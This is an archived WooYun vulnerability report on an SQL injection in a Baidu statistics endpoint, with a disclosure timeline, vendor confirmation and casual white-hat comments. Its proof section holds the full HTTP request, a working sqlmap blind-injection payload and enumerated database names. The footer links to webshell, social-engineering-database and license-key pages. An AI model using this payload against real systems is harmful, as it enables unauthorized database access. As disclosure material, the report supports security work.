百度某站存在SQL注入
- 发表于
- WooYun漏洞库
漏洞概要
缺陷编号:WooYun-2015-0123014
漏洞标题:百度某站存在SQL注入
相关厂商:百度
漏洞作者:紫霞仙子
提交时间:2015-06-26 21:57
公开时间:2015-08-13 14:32
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
漏洞详情
披露状态:
2015-06-26: 细节已通知厂商并且等待厂商处理中
2015-06-29: 厂商已经确认,细节仅向厂商公开
2015-07-09: 细节向核心白帽子及相关领域专家公开
2015-07-19: 细节向普通白帽子公开
2015-07-29: 细节向实习白帽子公开
2015-08-13: 细节向公众公开
简要描述:
233
详细说明:
|
1 2 3 4 5 6 7 8 9 10 11 |
POST /web/10681236/ajax/post HTTP/1.1<br> Content-Length: 362<br> Content-Type: application/x-www-form-urlencoded<br> X-Requested-With: XMLHttpRequest<br> Referer: tongji.baidu.com<br> Cookie:<br> Host: tongji.baidu.com<br> Connection: Keep-alive<br> Accept-Encoding: gzip,deflate<br> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36<br> Accept: */*et=1435248000000&et2=&flag=1&indicators=pv_count%2Cvisitor_count%2Coutward_count%2Cexit_count%2Caverage_stay_time&method=visit%2Ftoppage%2Fa&offset=0&order=pv_count%2Cdesc&queryId=&reportId=14&siteId=6981585&st=1435248000000&st2= |
漏洞证明:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
还好,可以直接跑出来,不麻烦。<br> ---<br> Parameter: flag (POST)<br> Type: boolean-based blind<br> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause<br> Payload: et=1435248000000&et2=&flag=1" RLIKE (SELECT (CASE WHEN (6023=6023) THEN 1 ELSE 0x28 END)) AND "nQcc"="nQcc&indicators=pv_count,visitor_count,outward_count,exit_count,average_stay_time&method=visit/toppage/a&offset=0&order=pv_count,desc&queryId=&reportId=14&siteId=6981585&st=1435248000000&st2=<br> ---<br> web application technology: Apache, PHP 5.3.23<br>back-end DBMS: MySQL 5current user: '[email protected]'available databases [7]:<br> [*] holmes<br> [*] holmes_global<br> [*] holmes_kv<br> [*] holmes_mkt<br> [*] holmes_new<br> [*] holmes_rec<br> [*] information_schema大量的数据:web application technology: Apache, PHP 5.3.23<br> back-end DBMS: MySQL 5<br> [21:49:31] [INFO] fetching tables for database: 'holmes_new'<br> [21:49:32] [INFO] fetching number of tables for database 'holmes_new'<br> [21:49:32] [INFO] retrieved: 102 102张表<br> [21:49:42] [INFO] retrieved: hm_account_invite_url<br> [21:52:02] [INFO] retrieved: hm_account_pop_menu<br> 。。。。。。。。。。。。。 |
修复方案:
~~~
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2015-06-2914:31
厂商回复:
谢交已提
最新状态:
暂无
评价
-
2010-01-01 00:00 天地不仁 以万物为刍狗 白帽子 | Rank:467 漏洞数:54)
仙子 约不?
2010-01-01 00:00 Looke 白帽子 | Rank:1078 漏洞数:85)估计排队约
2010-01-01 00:00 ’‘Nome 白帽子 | Rank:57 漏洞数:7)仙子,我就想知道你是男是女....
2010-01-01 00:00 sauren 白帽子 | Rank:49 漏洞数:5)仙子很爱注射方面嘛~
2010-01-01 00:00 DloveJ 白帽子 | Rank:731 漏洞数:64)我也想知道是妹子还是汉子!!
2010-01-01 00:00 龍 、 白帽子 | Rank:268 漏洞数:70)仙子 约不?
2010-01-01 00:00 紫霞仙子 白帽子 | Rank:885 漏洞数:70)@all 叔叔,我们不约、
2010-01-01 00:00 茜茜公主 白帽子 | Rank:899 漏洞数:85)大家都好热情
2010-01-01 00:00 scanf 白帽子 | Rank:1161 漏洞数:100)仙子我们可以搞基吗?
2010-01-01 00:00 紫霞仙子 白帽子 | Rank:885 漏洞数:70)@all 大家峰会见么
2010-01-01 00:00 DloveJ 白帽子 | Rank:731 漏洞数:64)@紫霞仙子 峰会不去怎么办@@
原文连接:百度某站存在SQL注入 所有媒体,可在保留署名、原文连接的情况下转载,若非则不得使用我方内容。- 2020 Google镜像大全,谷歌镜像网址
- BT磁力搜索引擎大全
- 东方网景某严重安全漏洞(可导致上万网站沦陷/域名劫持/FTP服务安全/集群安全等可受到影响)
- Javaweb架构分析安全之万户ezoffice全版本通杀上传GETSHELL
- 暗网是什么?如何进入暗网?
- 最新ESET NOD32 License Key/激活码/许可证密钥/用户名密码
- No Access-Control-Allow-Origin 跨域错误解决
- 社工库源码大全(持续更新)
- 谷歌识图,以图搜图
- this channel is blocked because it was used:Telegram群组/频道屏蔽解决方法
- 【透明互联网】社工库 Social Engineering Data
- 404.php webshell
- 怎么用图片搜索番号?
- 一个绕过Google谷歌验证码(reCAPTCHA)的方法
- 9部有史以来最好的黑客电影
扫码分享
验证:体验盒子扫码分享
打赏零钱
